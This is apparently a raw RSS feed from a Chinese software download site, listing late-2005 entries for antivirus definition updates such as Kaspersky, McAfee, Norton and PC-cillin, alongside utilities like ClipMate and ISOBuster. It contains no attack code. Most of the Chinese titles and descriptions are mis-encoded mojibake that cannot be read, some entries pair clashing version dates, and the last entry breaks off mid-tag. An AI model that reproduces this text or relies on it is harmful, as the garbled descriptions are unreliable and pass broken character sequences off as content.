16:00:00 GMT - - -¿¨°ֻֽ¹»ש Kaspersky Anti-Virus (AVP) ²¡¶¾ֲכ 2005.12.29 -http://www.softsea.net/soft/110478.htm - -<img src="http://www.softsea.net/shot1/110478.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;Kaspersky Anti-Virus (AVP) Weekly ²¡¶¾ֲכ 2003.07.25<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31114.htm">¿¨°ֻֽ¹»ש</a>] - -http://www.softsea.net/soft/110478.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -McAfee VirusScan EXE Installable Virus Definition Super Update 4.0.x Update 4661 -http://www.softsea.net/soft/110435.htm - -<img src="http://www.softsea.net/shot1/110435.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;McAfee Virusscan v4.0.x EXE Installable Virus Definition Super Update 4281 (posted 07/31/2003)<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31111.htm">McAfee</a>] - -http://www.softsea.net/soft/110435.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -McAfee VirusScan EXE Installable Virus Definition 4.0.x Update 4661 -http://www.softsea.net/soft/110434.htm - -<img src="http://www.softsea.net/shot1/110434.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;McAfee Virusscan v4.0.x EXE Installable Virus Definition Update 4281 (posted 07/31/2003)<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31111.htm">McAfee</a>] - -http://www.softsea.net/soft/110434.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -McAfee Virusscan Virus Definition 4.0.x Update 4661 -http://www.softsea.net/soft/110433.htm - -<img src="http://www.softsea.net/shot1/110433.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;McAfee Virusscan v4.0.x Virus Definition 4281 (posted 07/31/2003)<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31111.htm">McAfee</a>] - -http://www.softsea.net/soft/110433.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -Norton AntiVirus 4.x/5.x ²¡¶¾¿ג 2005ִך12װֲ28ָױ -http://www.softsea.net/soft/110415.htm - -<img src="http://www.softsea.net/shot1/110415.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;Norton AntiVirus 4.x/5.x ²¡¶¾¿ג<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31109.htm">Norton</a>] - -http://www.softsea.net/soft/110415.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -Norton AntiVirus 2000/2001/2002/2003 ²¡¶¾¿ג 2005ִך12װֲ28ָױ -http://www.softsea.net/soft/110414.htm - -<img src="http://www.softsea.net/shot1/110414.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;Norton AntiVirus 2000/2001/2002/2003 ²¡¶¾¿ג<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31109.htm">Norton</a>] - -http://www.softsea.net/soft/110414.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -PC-cillin Virus Pattern File 3.133 -http://www.softsea.net/soft/110391.htm - -<img src="http://www.softsea.net/shot1/110391.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;PC-cillin Virus Pattern File<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31108.htm">PC-cillin</a>] - -http://www.softsea.net/soft/110391.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -PC-cillin Virus Pattern File ֶָֿ°ז 3.134.04 -http://www.softsea.net/soft/110390.htm - -<img src="http://www.softsea.net/shot1/110390.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;PC-cillin Virus Pattern File 599 v03 ֶָֿ°ז<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31108.htm">PC-cillin</a>] - -http://www.softsea.net/soft/110390.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -½­ֳסֹ±¶¾KV2004ְכֿװצֱ¿ֹ‎¼¶° (2005.12.28) -http://www.softsea.net/soft/110388.htm - -<img src="http://www.softsea.net/shot1/110388.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;µ±¼א²ג²¡¶¾·ְ»נַ½¡£±״׀כָֿ½«ֻ½גׁ¹ֻץ£¬ָ»÷ף°²׳°װWINDOWS 95/98ֲֿ£¬װ₪·ְ²¢ִַַׂו³‎¸קײײDOS²¡¶¾¡¢WINDOWS²¡¶¾¡¢ֽרֲחָה³ז¡¢CIH²¡¶¾¡¢÷ך²¡¶¾µָ¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31107.htm">KVֿµֱ׀</a>] - -http://www.softsea.net/soft/110388.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -½נֹ½¶¾°װ ֻש׃׀°ז±¾ֹ‎¼¶° 2005.12.28 -http://www.softsea.net/soft/110286.htm - -<img src="http://www.softsea.net/shot1/110286.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;½נֹ½¶¾°װ ֻש׃׀°ז±¾ֹ‎¼¶°µִ¼¯÷ֿ ·½±ד¾­ֿתֹּ־×׃ֳ»§ײֶ׳קֹ‎¼¶ֵּ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31103.htm">½נֹ½¶¾°װ</a>] - -http://www.softsea.net/soft/110286.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -ClipMate Clipboard Extender 7.0.05 -http://www.softsea.net/soft/105967.htm - -<img src="http://www.softsea.net/shot1/105967.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױג¸צ³ּ׀ע׃כ¶¨ֶµִ Windows ¼פּש°וׂ»ֶנ¹₪׳ק÷ֽ¼ַµֳֳ¿¸צ¿י‎¾£¬ִדֻץ¼ץ»עױ³­ֿ®µִ־ִ±¾÷ֽֽ¼ֿס¡£ׂ»´־ִדµִ‎¾´¢´ז£¬ִדִ¹»ׁ¡װסֶ·ײײ»״׳װ¶¯µ״°ֻׁ·ֵµ½¼פּש°וֹֿ»עױײ±½׃µ½ִד¹׃ֳ³ּ׀עײ׀¡£<p>ִדִ¹»¿´£¬¿½±´£¬±א¼­£¬ײ״׀ֲ¸ס½»¯£¬׳×»»³ֹֹֿ»עױ׀¡׀´£¬ֻׁׁ°£¬ײ״׀ֲֳֳ£¬÷ֽײ״׀ֲ°²ֵֵ¼׀ּץ¿מ¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30102.htm">¼פּש°ו</a>] - -http://www.softsea.net/soft/105967.htm -Wed, 28 Dec 2005 16:00:00 GMT - - -TVK ֵµֱֽׂ׀־¬ֻ¹ּ״°²ָ«·ְֿ 2005 Build 1227 -http://www.softsea.net/soft/136595.htm - -<img src="http://www.softsea.net/shot1/136595.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ֵµֱֽׂ׀־¬ֻ¹ּ״ TVK °²ָ«·ְֿ 2005 ַׂ»¿מ¹¦ִַ¿´ף£¬²¢ֽ¬±׃µ׃׀·´ִ¾ֲם¡¢·´¼הµ‎÷ֽ·´²¡¶¾¹¦ִµִִ¾ֲם²¡¶¾²יֹ±¹₪¾¡£ֻ²ֹ׃ֳָ«ײִַ»¯µִִ¾ֲם²¡¶¾²יֹ±·½½£¬´׃ִ¾ֲם²¡¶¾µִ²יֹ±£¬µ½µחִװֿµֽ³µִ׀¸´£¬ֳִָֻתַבֹֻֽך³ֹ£»¶ְ´´µִִ¾ֲם²¡¶¾·ײ־צ¼ל²ג¼¼ץֳָֻ׃µ׃׀·ַ·²µִֹ¨ֳטֻ¶ָ¡£¶ְ´´µִµ±¼א¿״¹¦<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31191.htm">ֶהָֻם¼‏</a>] - -http://www.softsea.net/soft/136595.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -¿¨°ֻֽ¹»ש Kaspersky Internet Security 2006 Beta 6.0.16.251 Beta 2 -http://www.softsea.net/soft/134012.htm - -<img src="http://www.softsea.net/shot1/134012.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;Kaspersky ־×ָ־÷־׀־½µִ¸צּו÷ֹֽחֵּֽב¹©ֱֻׂ»¸צ¹ד·÷µִ¿¹²¡¶¾½ג¾צ·½°¸¡£ֻּב¹©ֱֻֻש׃׀ְא׀ֽµִ¿¹²¡¶¾·ְ»₪£÷¿¹²¡¶¾ֹ¨ֳטַׂ£¬¼א¿״ֶק£¬׀׀־×׳ט¶־÷ֽֽךָ«¼לׁי¡£ֻײ§³ײ¼¸÷ץַֻש׃׀µִֶױֽ¨²׳קֿµֽ³¡¢e-mail ֽ¨ֲ·÷ֽ·ְ»נַ½¡£Kaspersky¿״ײֶֻש׃׀¿ִֹµִ²¡¶¾½רָכ¶ֻ¿£¬ַֻ¿´ףµִ¹¦ִ÷ֽ¾ײ²¿ֱי»מ׀װׂװ¼°<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31114.htm">¿¨°ֻֽ¹»ש</a>] - -http://www.softsea.net/soft/134012.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -ATITool 0.25 beta 11 -http://www.softsea.net/soft/133221.htm - -<img src="http://www.softsea.net/shot1/133221.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ATIToolַׂ»¿מATIֿװ¿¨¹₪¾¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30510.htm">°ו¿¨¹₪¾</a>] - -http://www.softsea.net/soft/133221.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -Sateira CD&DVD Burner 2.41 -http://www.softsea.net/soft/131692.htm - -<img src="http://www.softsea.net/shot1/131692.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױגַׂ»¿מ׃ֳ׃¿ֲּ¼CD÷ֽDVDµִ°ְ¨ִֻ¸צ³ּ׀עµִָם¼‏°¡£ִד¿ֹׂװ´´½¨÷ֽ¿ֲּ¼´«ֽ³¸ס½µִCDs¡¢DVDs÷ֽISOֽ¼ֿסׂװ¼°¶אֿµֽ³÷ֶֽפ¶¯¹גֵּ¡£ִד¿ֹׂװ´׃WAV־ִ¼‏´´½¨÷ֽ¿ֲּ¼ׂפֶµCDsׂװ¼°ײ±½׃¿ֲּ¼CUEֽ¼ֿסµ½¹גֵּ¡£±¸·ִדµִ‎¾µ½CD»עױDVDֳ½ּו£¬²¢ַׂ¿ֹׂװ´׃¶אֿµֽ³¹גֵּ²י¿´÷ּֽבָ¡ֿµֽ³¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30104.htm">¹גַ‎¹₪¾</a>] - -http://www.softsea.net/soft/131692.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -CryptoExpert 2004 Pro 6.2.10 -http://www.softsea.net/soft/126101.htm - -<img src="http://www.softsea.net/shot1/126101.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;CryptoExpertַׂ»¸צ־ִ¼‏¼׃ֳ¹₪¾£¬¸ֳ¹₪¾¿ֹׂװ½«ּ״¶¨µִִ¿ֲ¼׀יִג³ֹׂ»¸צ´ֵֵַּ‎¶¯ֶק£¬ֻש׃׀¶ֱָ¡µִ¹‎³ּ¶¼¾­¹‎¼׃ֳ½גֳ´¦ְם¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/302.htm">־ִ¼‏¹₪¾</a> > <a href="http://www.softsea.net/cat/30216.htm">־ִ¼‏¼׃ֳ</a>] - -http://www.softsea.net/soft/126101.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -RegRun III Security Suite Standard 4.5 -http://www.softsea.net/soft/110587.htm - -<img src="http://www.softsea.net/shot1/110587.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ֿµֽ³°²ָ«±£»₪¹₪¾£¬¹¦ִ®·ײַ¿´ף¡£ױג¸צָם¼‏ׂװ÷÷ֳµ״¿״ײֶײמָח׃ֹ׳¢²ב±ם£¬ֿµֽ³־ִ¼‏£¬ֲֿװ״£¬»ע׃ֳ»§¶¨ׂוװ״ָכµִ׳װ¶¯װֻ׀׀³ּ׀ע¡£ֽ¬±ֽ¨¹‎¶װֿµֽ³ֻש׃׀½ר³ּ½ר׀׀µ±¼א²ג£¬RegRun ִ¹»׃׀׀§µ״¼ל²גµ½ׂ‏²״װֿµֽ³ײ׀µִִ¾ֲם³ּ׀ע£¬²¡¶¾»עֶהְֻ´ֲ·²»ֳקµִ³ּ׀ע¡£RegRun װֶהֻ³ּ׀עֶפ¶¯ַ°¼₪»מֻµִ¹¦<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31190.htm">ִ¾ֲם¼ל²ג</a>] - -http://www.softsea.net/soft/110587.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -RegRun III Security Suite Professional 4.5 -http://www.softsea.net/soft/110586.htm - -<img src="http://www.softsea.net/shot1/110586.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ֿµֽ³°²ָ«±£»₪¹₪¾£¬¹¦ִ®·ײַ¿´ף¡£ױג¸צָם¼‏ׂװ÷÷ֳµ״¿״ײֶײמָח׃ֹ׳¢²ב±ם£¬ֿµֽ³־ִ¼‏£¬ֲֿװ״£¬»ע׃ֳ»§¶¨ׂוװ״ָכµִ׳װ¶¯װֻ׀׀³ּ׀ע¡£ֽ¬±ֽ¨¹‎¶װֿµֽ³ֻש׃׀½ר³ּ½ר׀׀µ±¼א²ג£¬RegRun ִ¹»׃׀׀§µ״¼ל²גµ½ׂ‏²״װֿµֽ³ײ׀µִִ¾ֲם³ּ׀ע£¬²¡¶¾»עֶהְֻ´ֲ·²»ֳקµִ³ּ׀ע¡£RegRun װֶהֻ³ּ׀עֶפ¶¯ַ°¼₪»מֻµִ¹¦<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31190.htm">ִ¾ֲם¼ל²ג</a>] - -http://www.softsea.net/soft/110586.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -RegRun III Security Suite Gold 4.5 -http://www.softsea.net/soft/110585.htm - -<img src="http://www.softsea.net/shot1/110585.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;°²ָ«±£»₪¹₪¾£¬¹¦ִ®·ײַ¿´ף¡£ױג¸צָם¼‏ׂװ÷÷ֳµ״¿״ײֶײמָח׃ֹ׳¢²ב±ם£¬ֿµֽ³־ִ¼‏£¬ֲֿװ״£¬»ע׃ֳ»§¶¨ׂוװ״ָכµִ׳װ¶¯װֻ׀׀³ּ׀ע¡£ֽ¬±ֽ¨¹‎¶װֿµֽ³ֻש׃׀½ר³ּ½ר׀׀µ±¼א²ג£¬RegRun ִ¹»׃׀׀§µ״¼ל²גµ½ׂ‏²״װֿµֽ³ײ׀µִִ¾ֲם³ּ׀ע£¬²¡¶¾»עֶהְֻ´ֲ·²»ֳקµִ³ּ׀ע¡£RegRun װֶהֻ³ּ׀עֶפ¶¯ַ°¼₪»מֻµִ¹¦ִ£¬<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31190.htm">ִ¾ֲם¼ל²ג</a>] - -http://www.softsea.net/soft/110585.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -InoculateIT 6.0 Engine Version Full for Windows 9x/ME 23.71.30 -http://www.softsea.net/soft/110513.htm - -<img src="http://www.softsea.net/shot1/110513.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¼עׂ׳¹׃ֳµִ·ְ¶¾ָם¼‏£¬¿ֹ°ןִד׳װ¶¯ױל²ג÷ֶֽׂ³‎MS Officeµִ÷ך²¡¶¾¼°µח׳׃׃¼‏ײ׀µִ¶אײײ²¡¶¾¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31120.htm">InoculateIT</a>] - -http://www.softsea.net/soft/110513.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -InoculateIT 6.0 Engine Version Full for Windows NT/2000 23.71.30 -http://www.softsea.net/soft/110512.htm - -<img src="http://www.softsea.net/shot1/110512.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¼עׂ׳¹׃ֳµִ·ְ¶¾ָם¼‏£¬¿ֹ°ןִד׳װ¶¯ױל²ג÷ֶֽׂ³‎MS Officeµִ÷ך²¡¶¾¼°µח׳׃׃¼‏ײ׀µִ¶אײײ²¡¶¾¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31120.htm">InoculateIT</a>] - -http://www.softsea.net/soft/110512.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -InoculateIT 6.0 Engine Version Incremental update for Windows 9x from 23.71.00 to 23.71.30 -http://www.softsea.net/soft/110511.htm - -<img src="http://www.softsea.net/shot1/110511.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¼עׂ׳¹׃ֳµִ·ְ¶¾ָם¼‏£¬¿ֹ°ןִד׳װ¶¯ױל²ג÷ֶֽׂ³‎MS Officeµִ÷ך²¡¶¾¼°µח׳׃׃¼‏ײ׀µִ¶אײײ²¡¶¾¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31120.htm">InoculateIT</a>] - -http://www.softsea.net/soft/110511.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -InoculateIT 6.0 Engine Version Incremental update for Windows NT/2k from 23.71.00 to 23.71.30 -http://www.softsea.net/soft/110510.htm - -<img src="http://www.softsea.net/shot1/110510.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¼עׂ׳¹׃ֳµִ·ְ¶¾ָם¼‏£¬¿ֹ°ןִד׳װ¶¯ױל²ג÷ֶֽׂ³‎MS Officeµִ÷ך²¡¶¾¼°µח׳׃׃¼‏ײ׀µִ¶אײײ²¡¶¾¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31120.htm">InoculateIT</a>] - -http://www.softsea.net/soft/110510.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -¿¨°ֻֽ¹»ש Kaspersky Anti-Virus (AVP) Lite 6.0.16.251 Beta 2 -http://www.softsea.net/soft/110476.htm - -<img src="http://www.softsea.net/shot1/110476.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;װ¹תֽגְֶ¼¼«¸ֹ±¶¾ָם¼‏<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31114.htm">¿¨°ֻֽ¹»ש</a>] - -http://www.softsea.net/soft/110476.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -VRV2001 ׀ֲ°ז²¡¶¾¿גֹ‎¼¶־ִ¼‏(µ¥»ת¡¢ֽרֲח¿ֽ»§¶ֻ) 78S (2005.12.27) -http://www.softsea.net/soft/110356.htm - -<img src="http://www.softsea.net/shot1/110356.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;vrv2001 ׀ֲ°ז²¡¶¾¿גֹ‎¼¶־ִ¼‏(µ¥»ת¡¢ֽרֲח¿ֽ»§¶ֻ)<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31106.htm">±±׀ֵװ´VRV</a>] - -http://www.softsea.net/soft/110356.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -VRV2001 ׀ֲ°ז²¡¶¾¿גֹ‎¼¶־ִ¼‏(ֽרֲח·‏־סֶק¶ֻ) 78S (2005.12.27) -http://www.softsea.net/soft/110355.htm - -<img src="http://www.softsea.net/shot1/110355.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;vrv2001 ׀ֲ°ז²¡¶¾¿גֹ‎¼¶־ִ¼‏(ֽרֲח·‏־סֶק¶ֻ)<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/311.htm">²¡¶¾·ְײ־</a> > <a href="http://www.softsea.net/cat/31106.htm">±±׀ֵװ´VRV</a>] - -http://www.softsea.net/soft/110355.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -Backup2004 Pro 4.4.8.158 -http://www.softsea.net/soft/108977.htm - -<img src="http://www.softsea.net/shot1/108977.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;±¸·÷ֽ¸´װ­¹₪¾,ִ¹ְם±¸·־ִµµ<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30515.htm">ֿµֽ³±¸·</a>] - -http://www.softsea.net/soft/108977.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -¶¨±¹״»ת 2.39 -http://www.softsea.net/soft/108787.htm - -<img src="http://www.softsea.net/shot1/108787.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¿ֹׂװ¶װ׳װ¼÷µִµחִװ׃ֳ±¼הְ´¿״ײֶ.¿ֹׂװ¶¨±¹״»תֶק.¶¨±ײ״׀ֲֶפ¶¯,¶¨±÷פ½׀.¹¦ִַ¿´ף,µ«»¹׀טׂ×ֽר׃ׁ¶אּבׂג¼.<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30506.htm">׳װ¶¯¹״»ת</a>] - -http://www.softsea.net/soft/108787.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -Hyena 6.6 -http://www.softsea.net/soft/106467.htm - -<img src="http://www.softsea.net/shot1/106467.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ױגַׂ»±»¼¯ײ׀µִ׃ֳ׃¹ְםµִײ׀µ½´ף׀ֽµִ¹ְם¹₪¾£¬°ְ¨ NT/2000/XP »·¾³£¬»ל÷ֿ»עױ׳װָ»ִ£½¡£ױג¸צ±»¾¼¯µִ¹ְםµִ׃¦׃ֳ³ּ׀ע°ְ¨¹ד´ףµִ¶װֿף׳יײ¯µִµ¥־»¡£ײ§³ײActive Directory÷ֽLDAP¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30190.htm">ֶהֻ¹₪¾</a>] - -http://www.softsea.net/soft/106467.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -ISOBuster 1.9 -http://www.softsea.net/soft/106066.htm - -<img src="http://www.softsea.net/shot1/106066.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;ׂ»¸צִ¹»½« TAO¡¢DAO¡¢ISO¡¢BIN¡¢IMG¡¢CIF¡¢FCD µָ¾µֿף־ִ¼‏ִָײ±½׃׳¥ָ¡³צְ´µֳִג·ׁ¹₪¾¡£ײ§³ײ¸קײײָם¼‏ֻשײֶ׳קµִ¾µֿף־ִ¼‏£¬׃׀ Nero¡¢Duplicator¡¢BlindRead¡¢Easy-CD Creator¡¢CDR-Win¡¢Virtual CD-ROM¡¢CloneCD µָ£¬»¹¿ֹׂװ½« Video CD µִ DAT ־ִ¼‏׳×»»³ֹ MPG ־ִ¼‏¡£ײֶ׳ק¹«ֻ¾£÷<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/301.htm">µ׃ֳ¹₪¾</a> > <a href="http://www.softsea.net/cat/30104.htm">¹גַ‎¹₪¾</a>] - -http://www.softsea.net/soft/106066.htm -Tue, 27 Dec 2005 16:00:00 GMT - - -iPod2PC 2.50 -http://www.softsea.net/soft/135341.htm - -<img src="http://www.softsea.net/shot1/135341.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;¿ֹׂװ½«ipodײ׀µִMP3¸´ײֶµ½PC׃²ֵּ£¬²»׀טׂ×iTunes¡£ֻ¿ֹׂװֹ¨ֳטipodײ׀µִmp3£¬ׂװֱ׀±ם·½½ֿװ¾³צְ´£¬ָ»÷ף¾ֽ¿ֹׂװׁ¡װס׀טׂ׸´ײֶµִmp3ֱֻ¡£<br>[<a href="http://www.softsea.net/cat/3.htm">ֿµֽ³¹₪¾</a> > <a href="http://www.softsea.net/cat/305.htm">ֿµֽ³¹ְם</a> > <a href="http://www.softsea.net/cat/30517.htm">´ֵֵּ»ײ¸´</a>] - -http://www.softsea.net/soft/135341.htm -Mon, 26 Dec 2005 16:00:00 GMT - - -³¬ָ»½ר³ּ¹ְםֶק 2.6 -http://www.softsea.net/soft/126114.htm - -<img src="http://www.softsea.net/shot1/126114.gif" align="right" alt="Screenshot" hspace="10" vspace="10">&nbsp;&nbsp;&nbsp;&nbsp;1£÷ֿµֽ³½ר³ּ¡¢ִ£¿י¡¢´°¿׳ֱֿµִֿךֿ¸²י¿´¡££¨ָח¸ֳ½ר³ּװ­־ִ¼‏ֲ·¾¶¡¢ֻשµק׃ֳִ£¿י¡¢ִ´ז¹׃ֱֳ¿µָ´ףֱ¿׀ֵֿ¢£©¿ֹ°ןִדֱֻ½גִדµִֿµֽ³¡£׃ֳׁש¿ֹׂװְ׃ְֳֻ´·¢ֿײׂ»׀©¿ֹׂװµִ³ּ׀ע¡£2£÷¶װ½ר³ּ½ר׀׀µ¥¸צ¹״±ױ»עֵתֱ¿¹״±ױ£¬ֹטײֳ׃ֵָֿ¼¶¡£<br 